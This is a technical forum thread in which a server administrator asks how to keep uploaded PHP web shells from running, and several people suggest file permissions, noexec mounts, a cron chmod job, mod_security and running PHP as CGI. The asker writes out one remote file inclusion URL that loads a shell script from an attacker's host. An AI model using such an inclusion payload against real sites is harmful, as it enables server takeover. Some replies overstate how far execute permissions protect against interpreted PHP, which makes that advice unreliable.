• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 610
  • Last Modified:

prevent shells

      Hello,
i have a Linux server with cpanel and whm on apache server
i need a  way  in a programing shell script  to prevent the execution of the most common php shell pages like r75 and ch99


i need shell pages not to be executed even if its uploaded
not just depend on the file names but depend also on the file content
i have copies of all the common shells in case the programmer need to have a look on them to know what he is going to disable


i know there are way in mod security and i know the root kit hunter but actually am looking for  a way by programing shell script that prevent the execution of the most common php shell page.

0
NT-lover
Asked:
NT-lover
  • 5
  • 3
  • 2
  • +4
5 Solutions
 
omarfaridCommented:
How the files are uploaded?

You may revoke execute permission from those files.
0
 
NT-loverAuthor Commented:
hi

actually am looking for solution in scripting shell when hackers they success to uploaded to my server
0
 
NT-loverAuthor Commented:
Gents


this question  just for EXPERTS   i need shell pages not to be executed even if its uploaded



by  find solution also by  programing script shell  that prevent   php shell pages like r75 and ch99 not just depend on the file names but depend also on the file content,


Regads

 
0
Threat Trends for MSPs to Watch

See the findings.
Despite its humble beginnings, phishing has come a long way since those first crudely constructed emails. Today, phishing sites can appear and disappear in the length of a coffee break, and it takes more than a little know-how to keep your clients secure.

 
NT-loverAuthor Commented:

Dear


PenguinMod,


thank you for replay but actually my question  was very cleared  


(i need way by  programing shell  that prevent shell pages not to be executed even if its uploaded)




and the comment of  My dear . omarfarid:

(You may revoke execute permission from those files).




and you can see am not talking about permission my question  was very clear   as i mention i need way that prevent shell pages not to be  EXECUTED EVEN IF ITS UPLOADED by  (Shell language) not by  permission or way in permission and i mention also EVEN IF ITS UPLOADED



so am not here disrespected anyone and if my dear omarfarid see my words is disrespected for him am apology's for him



  but  i need the experts people that can handle the questions serious and help me and help any one have the same question so the matter is not related to disrespected to anyone i need just  experts and they read the complete question before they post any comment or solution so am not here disrespected anyone



So this my first question if am not welcome here and  am not find here help from experts so please tell dear PenguinMod: to cancel my membership and cancel this question


 thank your for time and your support.


Regards

0
 
omarfaridCommented:
Dear PenguinMod:

Thank you for monitoring the questions and comments made.

Dear NT-lover:

I would like to clarify something. As EE Experts, our goal is to help in answering questions posted.

When I read your question, it was not clear to me how the shell pages are uploaded since hosting providers do allow their customers to upload their pages etc. The first thing came to my mind was if this is the case then revoking the permissions of these pages might give you what you want.
0
 
NT-loverAuthor Commented:
Dear omarfarid


First of all, thank you for your replay  and actually i appreciate your help As EE Experts



Second point dear omarfarid

 you should know  there are many exploits that can any hacker upload any php shell such as symlink function , RFI . XSS .. and this example for RFI


httX://yourSite/bad_code_file.php?action=_httX://attackerSite/phpShell.txt?


so here am not talk about permissions  actually i talk about


How i can stop any php shell after uploaded to my server (and am looking to find solution by shell scripting language ) i hope my question it well be clear know.


Best Regards
0
 
nexusnationCommented:
NT-lover,

I am no expert,  but if you set the file modes/permissions using the Chmod UNIX/Linux command to something that does not allow execution, the file by definition cannot be executed. Provided you consider Chmod a "programming shell script," this will work perfectly to prevent the script from being able to execute.

http://en.wikipedia.org/wiki/Chmod
0
 
NT-loverAuthor Commented:
nexusnation,


it well not help me any solution by modes/permissions because i see many tools that hackers  used it to break the permissions  easily  also if  i prevent   php shell by using idea that related to  permission ? what about perl shell , cgi  shell , telnet shell in addition there are private exploit in php that can break the  file permissions my friend face it before 4 month


so it well not help me  but really thank you for your help and really i appreciate it.


regards
0
 
nexusnationCommented:
NT-lover,

If you're that unnecessarily paranoid about security, you're never going to agree to any solution provided, so there's not much more I can do to help.

File permissions are *not* PHP-based.  They are server-based (in this case Linux).  You can't simply break them using PHP, nor do you set them using php.  Chmod IS a shell command.  This is *exactly* what you're looking for; there's not much else.  After that, you're simply confusing terminology as well as technologies.

There are only two ways to prevent execution of code to your expectation of security:
 - Set appropriate file permissions on the server.
 - Don't upload it to begin with.

That's it.
0
 
Hanno P.S.IT Consultant and Infrastructure ArchitectCommented:
a file on a unix system that does not have execute permissions cannot be executed -- that's what the execute permissionis for
This is fundamentally different to any kind of Windows OS as there is no
such mechanism known. Any file with matching extension in it's bare name
(e.g. *.exe) can get executed right away.

The only way to "execute" fileson a Unix-based system which don't have
the execute permission is by letting them get interpreted by some other
executable program. Most commonly, you use some shell (executable) to
interpret a shell script.

Assume you have the file /path-to/file/abc.sh wich is not executable.
You cannot execute it with the command
  /path-to/file/abc.sh
But it can get interpreted by a shell with the command
  /usr/bin/my-shell  /path-to/file/abc.sh
0
 
ahoffmannCommented:
> .. there are many exploits that can any hacker upload any php shell ..
how about simply disabling uploads
Or do I miss something in the description?
0
 
Gabriel OrozcoSolution ArchitectCommented:
hey I like the comment from ahoffmann :-)

there are a lot of ways you can harden your system

a) upload your files to a partition that has the "noexec" parameter. it is simple: no program will be started from a mount point that has the "noexec" turned on. that is usual for /tmp and /var/tmp

b) only allow php to execute a defined extension, like .php
c) restrict your upload script to NOT ACCEPT anything with extension .php
d) execute file scanners as rootkit hunter.
e) you can write crontab. every minute it launchs a find command for executables. changes them to not exec:
* * * * * /sbin/find /upload/directory -type f -perm +x -exec /sbin/chmod a-x {} \;

also files should not be owned by the same user your web server is running with, so they are not modificable.

these are the first that come into my mind. YMMV
0
 
gothicbloodyCommented:
Hi ,
Install mod_security with rules web server firewall , and also try to install suPHP to run script under the same users , and also check folder permissions
0
 
Gabriel OrozcoSolution ArchitectCommented:
mod_security can be costly when the site has many hundred of users. other thant that, it is a great way to secure your system
0
 
Gabriel OrozcoSolution ArchitectCommented:
I got an alert about this question being closed.

Before it is closed, I want to comment a way PHP scripts can be stoped:

use PHP as cgi-bin, not as a module for apache.

then disallow uploads to the cgi-bin directory (very easy is you simply set directory permissions).

that way, even if a php script can be uploaded to the system, it would not be executed unless such script is in the cgi-bin directory, which is not writable.

that is exactly what was asked. how to prevent an uploaded php script to be executed.

NT-lover: can you reply back if this is your answer pls?
0

Featured Post

Nothing ever in the clear!

This technical paper will help you implement VMware’s VM encryption as well as implement Veeam encryption which together will achieve the nothing ever in the clear goal. If a bad guy steals VMs, backups or traffic they get nothing.

  • 5
  • 3
  • 2
  • +4
Tackle projects and never again get stuck behind a technical roadblock.
Join Now